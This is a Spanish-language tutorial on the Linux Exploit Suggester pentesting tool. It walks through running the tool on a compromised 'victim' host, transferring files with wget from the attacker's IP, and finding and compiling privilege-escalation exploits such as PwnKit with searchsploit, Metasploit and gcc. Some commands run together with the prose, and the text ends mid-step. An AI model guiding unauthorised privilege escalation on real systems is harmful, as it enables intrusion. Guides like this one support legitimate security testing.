Linux Exploit Suggester: Guía Rápida
Linux Exploit Suggester: Guía Rápida
Linux Exploit Suggester (LES) es una de las herramientas más queridas en el mundo del pentesting cuando se trata de escalada de privilegios en sistemas Linux.
Básicamente, es un script que analiza el kernel y el sistema operativo de una máquina para decirte: "Oye, basándome en esta versión de Linux, estos son los exploits que probablemente funcionarán para que te conviertas en root".
Aquí tienes una guía rápida en español para entender cómo funciona y cómo usarlo:
🚀 ¿Para qué sirve?
Cuando consigues acceso a una máquina Linux con un usuario de pocos privilegios (como www-data), tu siguiente objetivo es ser root.
LES automatiza la búsqueda de vulnerabilidades conocidas comparando la versión del kernel del objetivo con una base de datos de exploits (como los famosos Dirty COW, PwnKit, etc.).
Características principales:
Ligero: Es un simple script en Bash (o Perl, dependiendo de la versión).
Sin dependencias: No necesita instalar librerías raras, lo cual es vital si estás en una máquina "víctima".
Reporte detallado: Te da el nombre del exploit, el código CVE y, a menudo, el enlace para descargarlo.
🛠️ Cómo usarlo en Kali Linux
Aunque puedes tenerlo en tu máquina Kali, lo normal es transferirlo a la máquina que quieres comprometer.
1. Obtener el script
En tu Kali, puedes clonar el repositorio oficial:
git clone https://github.com/mzet-/linux-exploit-suggester.git
cd linux-exploit-suggester
2. Ejecutarlo (Escenario típico)
Si ya estás dentro de la máquina objetivo, simplemente ejecuta:
./linux-exploit-suggester.sh
3. Interpretar los resultados
El script te mostrará una lista clasificada por "Probabilidad" (Exposure):
Highly probable: Son los primeros que deberías probar.
Probable: Tienen buena pinta, pero podrían fallar según la configuración.
💡 Consejos Pro
Transferencia rápida: Si tienes acceso por consola a la víctima, puedes levantar un servidor temporal en Kali con
python3 -m http.server 80y luego desde la víctima usarwget http://tu-ip/les.sh.Mantente actualizado: El kernel de Linux cambia rápido. Asegúrate de bajar la última versión del script antes de una auditoría importante para no perderte nuevos exploits como los de los últimos años (ej. Looney Tunables).
No es infalible: Que el script sugiera un exploit no significa que vaya a funcionar al 100%. A veces las protecciones como ASLR o parches específicos del fabricante bloquean la ejecución.
Una vez que Linux Exploit Suggester (LES) te da una lista de posibles vulnerabilidades, el siguiente paso es encontrar el código (el "exploit") para ejecutarlo.
Aquí te explico las tres vías principales para buscar y descargar esos exploits de forma segura y eficiente:
1. Usar searchsploit (Directo en Kali Linux)
Kali tiene una copia local de la base de datos de Exploit-DB. Es la forma más rápida de buscar sin necesidad de internet.
Si LES te sugiere, por ejemplo, "Dirty COW" o el CVE-2021-4034 (PwnKit), haz lo siguiente:
Buscar por nombre o CVE:
Bashsearchsploit PwnKit # O por número de CVE searchsploit CVE-2021-4034Ver la ruta del archivo: Si encuentras uno que te sirve, usa el parámetro
-ppara ver la ruta completa del archivo.co.py.Bashsearchsploit -p 40839Copiarlo a tu carpeta actual:
Bashsearchsploit -m 40839
2. Bases de Datos Online (Las más confiables)
Si prefieres ver el código en el navegador o buscar explicaciones detalladas, estas son las fuentes de referencia:
| Sitio Web | Para qué sirve |
| Exploit-DB | El estándar de la industria. Contiene el código fuente verificado. |
| GitHub | Ideal para encontrar versiones "modernas" o scripts de automatización para CVEs recientes. |
| NVD (NIST) | Para leer la descripción técnica oficial de la vulnerabilidad. |
3. Metasploit Framework
Si el exploit es muy conocido, es probable que ya exista un módulo dentro de Metasploit, lo cual facilita mucho la post-explotación.
Abre la consola:
msfconsoleBusca el exploit:
search type:exploit platform:linux name:pwnkitSelecciona el módulo:
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
⚠️ Pasos críticos antes de ejecutar
No es solo "descargar y listo". Casi siempre tendrás que preparar el archivo:
Revisar el código: Abre el archivo con
catonano. Muchos exploits de Exploit-DB tienen instrucciones en los comentarios de la parte superior sobre cómo compilarlo.Compilación (si es un .c): Normalmente se usa GCC en la máquina objetivo:
Bashgcc exploit.c -o exploit_ejecutableDar permisos: ```bash
chmod +x exploit_ejecutable